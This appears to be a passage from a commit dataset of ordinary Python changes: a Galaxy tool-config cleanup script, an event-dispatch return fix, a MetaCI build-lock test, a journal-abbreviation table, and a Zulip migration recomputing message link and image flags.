For each child in children, check if child is tool. If it does not, check
if child is section. If it is, recurse into section.
If it has a file attribute, check if the path exists, else remove child from root.
"""
for child in children:
if child.tag == "section":
check_child(root = children,
children = child.getchildren(),
tooldir = tooldir,
removed_tools = removed_tools)
elif child.tag == "tool":
if path.exists( path.join (tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries." )
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml=args.input_xml
output_xml=args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()
|
Add script that removes non-existent xml entries from shed_tool_conf.xml and migrated_tool_conf.xml#!/usr/bin/env python
## Example usage: python clean_tool_conf.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools = []):
"""
For each child in children, check if child is tool. If it does not, check
if child is section. If it is, recurse into section.
If it has a file attribute, check if the path exists, else remove child from root.
"""
for child in children:
if child.tag == "section":
check_child(root = children,
children = child.getchildren(),
tooldir = tooldir,
removed_tools = removed_tools)
elif child.tag == "tool":
if path.exists( path.join (tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries." )
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml=args.input_xml
output_xml=args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()
|
<commit_before><commit_msg>Add script that removes non-existent xml entries from shed_tool_conf.xml and migrated_tool_conf.xml<commit_after>#!/usr/bin/env python
## Example usage: python clean_tool_conf.py -i /galaxy/config/shed_tool_conf.xml -o clean_shed_tool_conf.xml
import xml.etree.ElementTree as ET
from os import path
from argparse import ArgumentParser
def check_child(root, children, tooldir, removed_tools = []):
"""
For each child in children, check if child is tool. If it does not, check
if child is section. If it is, recurse into section.
If it has a file attribute, check if the path exists, else remove child from root.
"""
for child in children:
if child.tag == "section":
check_child(root = children,
children = child.getchildren(),
tooldir = tooldir,
removed_tools = removed_tools)
elif child.tag == "tool":
if path.exists( path.join (tooldir, child.attrib["file"])):
pass
else:
children.remove(child)
removed_tools.append(child.attrib["file"])
return removed_tools
def _parse_cli_options():
"""
Parse command line options, returning `parse_args` from `ArgumentParser`.
"""
parser = ArgumentParser(usage="usage: python %(prog)s <options>")
parser.add_argument("-i", "--input",
dest="input_xml",
required=True,
help="shed_tool_conf.xml or migrated_tool_conf.xml \
that needs to be cleaned from non-existant entries." )
parser.add_argument("-o", "--output_xml",
required=True,
dest="output_xml",
help="Output file for cleaned xml")
return parser.parse_args()
def __main__():
args = _parse_cli_options()
input_xml=args.input_xml
output_xml=args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()
|
|
81e3e688aba1ec18b80188077b664e1a85d1e717
|
src/events.py
|
src/events.py
|
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
|
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return True
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
|
Fix Event.dispatch to return True if execution is to proceed
|
Fix Event.dispatch to return True if execution is to proceed
|
Python
|
bsd-2-clause
|
billion57/lykos,Agent-Isai/lykos,Cr0wb4r/lykos,Diitto/lykos
|
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
Fix Event.dispatch to return True if execution is to proceed
|
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return True
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
|
<commit_before># event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
<commit_msg>Fix Event.dispatch to return True if execution is to proceed<commit_after>
|
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return True
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
|
# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
Fix Event.dispatch to return True if execution is to proceed# event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return True
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
|
<commit_before># event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
<commit_msg>Fix Event.dispatch to return True if execution is to proceed<commit_after># event system
EVENT_CALLBACKS = {}
def add_listener(event, callback, priority = 5):
if event not in EVENT_CALLBACKS:
EVENT_CALLBACKS[event] = []
if (priority, callback) not in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].append((priority, callback))
EVENT_CALLBACKS[event].sort(key = lambda x: x[0])
def remove_listener(event, callback, priority = 5):
if event in EVENT_CALLBACKS and (priority, callback) in EVENT_CALLBACKS[event]:
EVENT_CALLBACKS[event].remove((priority, callback))
class Event:
def __init__(self, name, data):
self.stop_processing = False
self.prevent_default = False
self.name = name
self.data = data
def dispatch(self, *args):
if self.name not in EVENT_CALLBACKS:
return True
for item in list(EVENT_CALLBACKS[self.name]):
item[1](self, *args)
if self.stop_processing:
break
return not self.prevent_default
# vim: set expandtab:sw=4:ts=4:
|
8c54e99f0a53b678ea14a850bed8cf9f6dd3c8bb
|
metaci/build/tests/test_rq_tasks.py
|
metaci/build/tests/test_rq_tasks.py
|
# Lots of work to be done here!!!!
from unittest import mock
from django.test import TestCase
from metaci.build.tasks import check_queued_build
from metaci.conftest import (
BuildFactory,
OrgFactory,
PlanFactory,
PlanRepositoryFactory,
RepositoryFactory,
)
@mock.patch("metaci.build.tasks.reset_database_connection")
class TestRunBuild(TestCase):
@mock.patch("metaci.build.management.commands.run_build.scratch_org_limits")
@mock.patch("metaci.build.tasks.lock_org")
@mock.patch("metaci.build.models.Build.run")
def test_lock_set(
self, run, lock_org, scratch_org_limits, reset_database_connection
):
build_timeout = 100
repo = RepositoryFactory(name="myrepo")
OrgFactory(name="myorg", repo=repo, scratch=False)
plan = PlanFactory(name="myplan", org="myorg", build_timeout=build_timeout)
build = BuildFactory(repo=repo, plan=plan)
PlanRepositoryFactory(repo=repo, plan=plan)
check_queued_build(build.id)
print(lock_org.mock_calls)
assert lock_org.mock_calls
assert lock_org.mock_calls[0][1][2] == build_timeout
|
Test the RQ task as well.
|
Test the RQ task as well.
|
Python
|
bsd-3-clause
|
SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci
|
Test the RQ task as well.
|
# Lots of work to be done here!!!!
from unittest import mock
from django.test import TestCase
from metaci.build.tasks import check_queued_build
from metaci.conftest import (
BuildFactory,
OrgFactory,
PlanFactory,
PlanRepositoryFactory,
RepositoryFactory,
)
@mock.patch("metaci.build.tasks.reset_database_connection")
class TestRunBuild(TestCase):
@mock.patch("metaci.build.management.commands.run_build.scratch_org_limits")
@mock.patch("metaci.build.tasks.lock_org")
@mock.patch("metaci.build.models.Build.run")
def test_lock_set(
self, run, lock_org, scratch_org_limits, reset_database_connection
):
build_timeout = 100
repo = RepositoryFactory(name="myrepo")
OrgFactory(name="myorg", repo=repo, scratch=False)
plan = PlanFactory(name="myplan", org="myorg", build_timeout=build_timeout)
build = BuildFactory(repo=repo, plan=plan)
PlanRepositoryFactory(repo=repo, plan=plan)
check_queued_build(build.id)
print(lock_org.mock_calls)
assert lock_org.mock_calls
assert lock_org.mock_calls[0][1][2] == build_timeout
|
<commit_before><commit_msg>Test the RQ task as well.<commit_after>
|
# Lots of work to be done here!!!!
from unittest import mock
from django.test import TestCase
from metaci.build.tasks import check_queued_build
from metaci.conftest import (
BuildFactory,
OrgFactory,
PlanFactory,
PlanRepositoryFactory,
RepositoryFactory,
)
@mock.patch("metaci.build.tasks.reset_database_connection")
class TestRunBuild(TestCase):
@mock.patch("metaci.build.management.commands.run_build.scratch_org_limits")
@mock.patch("metaci.build.tasks.lock_org")
@mock.patch("metaci.build.models.Build.run")
def test_lock_set(
self, run, lock_org, scratch_org_limits, reset_database_connection
):
build_timeout = 100
repo = RepositoryFactory(name="myrepo")
OrgFactory(name="myorg", repo=repo, scratch=False)
plan = PlanFactory(name="myplan", org="myorg", build_timeout=build_timeout)
build = BuildFactory(repo=repo, plan=plan)
PlanRepositoryFactory(repo=repo, plan=plan)
check_queued_build(build.id)
print(lock_org.mock_calls)
assert lock_org.mock_calls
assert lock_org.mock_calls[0][1][2] == build_timeout
|
Test the RQ task as well.# Lots of work to be done here!!!!
from unittest import mock
from django.test import TestCase
from metaci.build.tasks import check_queued_build
from metaci.conftest import (
BuildFactory,
OrgFactory,
PlanFactory,
PlanRepositoryFactory,
RepositoryFactory,
)
@mock.patch("metaci.build.tasks.reset_database_connection")
class TestRunBuild(TestCase):
@mock.patch("metaci.build.management.commands.run_build.scratch_org_limits")
@mock.patch("metaci.build.tasks.lock_org")
@mock.patch("metaci.build.models.Build.run")
def test_lock_set(
self, run, lock_org, scratch_org_limits, reset_database_connection
):
build_timeout = 100
repo = RepositoryFactory(name="myrepo")
OrgFactory(name="myorg", repo=repo, scratch=False)
plan = PlanFactory(name="myplan", org="myorg", build_timeout=build_timeout)
build = BuildFactory(repo=repo, plan=plan)
PlanRepositoryFactory(repo=repo, plan=plan)
check_queued_build(build.id)
print(lock_org.mock_calls)
assert lock_org.mock_calls
assert lock_org.mock_calls[0][1][2] == build_timeout
|
<commit_before><commit_msg>Test the RQ task as well.<commit_after># Lots of work to be done here!!!!
from unittest import mock
from django.test import TestCase
from metaci.build.tasks import check_queued_build
from metaci.conftest import (
BuildFactory,
OrgFactory,
PlanFactory,
PlanRepositoryFactory,
RepositoryFactory,
)
@mock.patch("metaci.build.tasks.reset_database_connection")
class TestRunBuild(TestCase):
@mock.patch("metaci.build.management.commands.run_build.scratch_org_limits")
@mock.patch("metaci.build.tasks.lock_org")
@mock.patch("metaci.build.models.Build.run")
def test_lock_set(
self, run, lock_org, scratch_org_limits, reset_database_connection
):
build_timeout = 100
repo = RepositoryFactory(name="myrepo")
OrgFactory(name="myorg", repo=repo, scratch=False)
plan = PlanFactory(name="myplan", org="myorg", build_timeout=build_timeout)
build = BuildFactory(repo=repo, plan=plan)
PlanRepositoryFactory(repo=repo, plan=plan)
check_queued_build(build.id)
print(lock_org.mock_calls)
assert lock_org.mock_calls
assert lock_org.mock_calls[0][1][2] == build_timeout
|
|
dacbb2ea0b9090a4783253259dced055da05ef26
|
journal_abbreviations.py
|
journal_abbreviations.py
|
"""Some additional journal abbreviations which are not provided by Crossref."""
JOURNAL_ABBRVS = {
"American Journal of Mathematics": "Am. J. Math.",
"American Journal of Physics": "Am. J. Phys",
"Annals of Physics": "Ann. Phys.",
"Communications in Mathematical Physics": "Commun. Math. Phys.",
"Journal of Mathematical Physics": "J. Math. Phys.",
"Journal of Statistical Physics": "J. Stat. Phys.",
"Nature Physics": "Nat. Phys.",
"Nuclear Physics B": "Nucl. Phys. B",
"Physics Letters A": "Phys. Lett. A"
}
|
Refactor journal abbreviations into seperate file
|
Refactor journal abbreviations into seperate file
|
Python
|
mit
|
teunzwart/latex-production-tools
|
Refactor journal abbreviations into seperate file
|
"""Some additional journal abbreviations which are not provided by Crossref."""
JOURNAL_ABBRVS = {
"American Journal of Mathematics": "Am. J. Math.",
"American Journal of Physics": "Am. J. Phys",
"Annals of Physics": "Ann. Phys.",
"Communications in Mathematical Physics": "Commun. Math. Phys.",
"Journal of Mathematical Physics": "J. Math. Phys.",
"Journal of Statistical Physics": "J. Stat. Phys.",
"Nature Physics": "Nat. Phys.",
"Nuclear Physics B": "Nucl. Phys. B",
"Physics Letters A": "Phys. Lett. A"
}
|
<commit_before><commit_msg>Refactor journal abbreviations into seperate file<commit_after>
|
"""Some additional journal abbreviations which are not provided by Crossref."""
JOURNAL_ABBRVS = {
"American Journal of Mathematics": "Am. J. Math.",
"American Journal of Physics": "Am. J. Phys",
"Annals of Physics": "Ann. Phys.",
"Communications in Mathematical Physics": "Commun. Math. Phys.",
"Journal of Mathematical Physics": "J. Math. Phys.",
"Journal of Statistical Physics": "J. Stat. Phys.",
"Nature Physics": "Nat. Phys.",
"Nuclear Physics B": "Nucl. Phys. B",
"Physics Letters A": "Phys. Lett. A"
}
|
Refactor journal abbreviations into seperate file"""Some additional journal abbreviations which are not provided by Crossref."""
JOURNAL_ABBRVS = {
"American Journal of Mathematics": "Am. J. Math.",
"American Journal of Physics": "Am. J. Phys",
"Annals of Physics": "Ann. Phys.",
"Communications in Mathematical Physics": "Commun. Math. Phys.",
"Journal of Mathematical Physics": "J. Math. Phys.",
"Journal of Statistical Physics": "J. Stat. Phys.",
"Nature Physics": "Nat. Phys.",
"Nuclear Physics B": "Nucl. Phys. B",
"Physics Letters A": "Phys. Lett. A"
}
|
<commit_before><commit_msg>Refactor journal abbreviations into seperate file<commit_after>"""Some additional journal abbreviations which are not provided by Crossref."""
JOURNAL_ABBRVS = {
"American Journal of Mathematics": "Am. J. Math.",
"American Journal of Physics": "Am. J. Phys",
"Annals of Physics": "Ann. Phys.",
"Communications in Mathematical Physics": "Commun. Math. Phys.",
"Journal of Mathematical Physics": "J. Math. Phys.",
"Journal of Statistical Physics": "J. Stat. Phys.",
"Nature Physics": "Nat. Phys.",
"Nuclear Physics B": "Nucl. Phys. B",
"Physics Letters A": "Phys. Lett. A"
}
|
|
60d307ac3f4edf4eb47e0ff4d67347345a2965f3
|
zerver/migrations/0257_fix_has_link_attribute.py
|
zerver/migrations/0257_fix_has_link_attribute.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
# simple as just just checking if there's any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
Add migrations to correct has_* fields.
|
message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.
|
Python
|
apache-2.0
|
timabbott/zulip,hackerkid/zulip,punchagan/zulip,punchagan/zulip,showell/zulip,rht/zulip,andersk/zulip,synicalsyntax/zulip,andersk/zulip,showell/zulip,zulip/zulip,eeshangarg/zulip,synicalsyntax/zulip,showell/zulip,synicalsyntax/zulip,rht/zulip,timabbott/zulip,zulip/zulip,eeshangarg/zulip,brainwane/zulip,rht/zulip,rht/zulip,shubhamdhama/zulip,kou/zulip,brainwane/zulip,zulip/zulip,timabbott/zulip,shubhamdhama/zulip,zulip/zulip,rht/zulip,kou/zulip,brainwane/zulip,eeshangarg/zulip,zulip/zulip,brainwane/zulip,eeshangarg/zulip,eeshangarg/zulip,timabbott/zulip,shubhamdhama/zulip,zulip/zulip,synicalsyntax/zulip,punchagan/zulip,kou/zulip,synicalsyntax/zulip,andersk/zulip,eeshangarg/zulip,rht/zulip,shubhamdhama/zulip,brainwane/zulip,hackerkid/zulip,punchagan/zulip,brainwane/zulip,synicalsyntax/zulip,eeshangarg/zulip,hackerkid/zulip,synicalsyntax/zulip,shubhamdhama/zulip,andersk/zulip,showell/zulip,showell/zulip,hackerkid/zulip,hackerkid/zulip,hackerkid/zulip,brainwane/zulip,kou/zulip,punchagan/zulip,shubhamdhama/zulip,punchagan/zulip,timabbott/zulip,showell/zulip,kou/zulip,kou/zulip,zulip/zulip,showell/zulip,hackerkid/zulip,andersk/zulip,timabbott/zulip,shubhamdhama/zulip,rht/zulip,timabbott/zulip,andersk/zulip,punchagan/zulip,kou/zulip,andersk/zulip
|
message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
# simple as just just checking if there's any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
<commit_before><commit_msg>message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
# simple as just just checking if there's any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
# simple as just just checking if there's any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
operations = [
migrations.RunPython(fix_has_link,
reverse_code=migrations.RunPython.noop),
]
|
<commit_before><commit_msg>message: Add migrations to correct has_* fields.
This follows up on changes to correctly set has_link, has_attachment,
and has_image when rendering messages.
Fixes #12912.<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-07 05:25
from __future__ import unicode_literals
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
import lxml
def fix_has_link(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Message = apps.get_model('zerver', 'Message')
for message in Message.objects.all():
# Because we maintain the Attachment table, this should be as
# simple as just just checking if there's any Attachment
# objects associated with this message.
has_attachment = message.attachment_set.exists()
# For has_link and has_image, we need to parse the messages.
# Links are simple -- look for a link in the message.
lxml_obj = lxml.html.fromstring(message.rendered_content)
has_link = False
for link in lxml_obj.xpath("//a"):
has_link = True
break
# has_image refers to inline image previews, so we just check
# for the relevant CSS class.
has_image = False
for img in lxml_obj.find_class("message_inline_image"):
has_image = True
break
if (message.has_link == has_link and
message.has_attachment == has_attachment and
message.has_image == has_image):
# No need to spend time with the database if there aren't changes.
continue
message.has_image = has_image
message.has_link = has_link
message.has_attachment = has_attachment
message.save(update_fields=['has_link', 'has_attachment', 'has_image'])
class Migration(migrations.Migration):
dependencies = [
('zerver', '0256_userprofile_stream_set_recipient_column_values'),
]
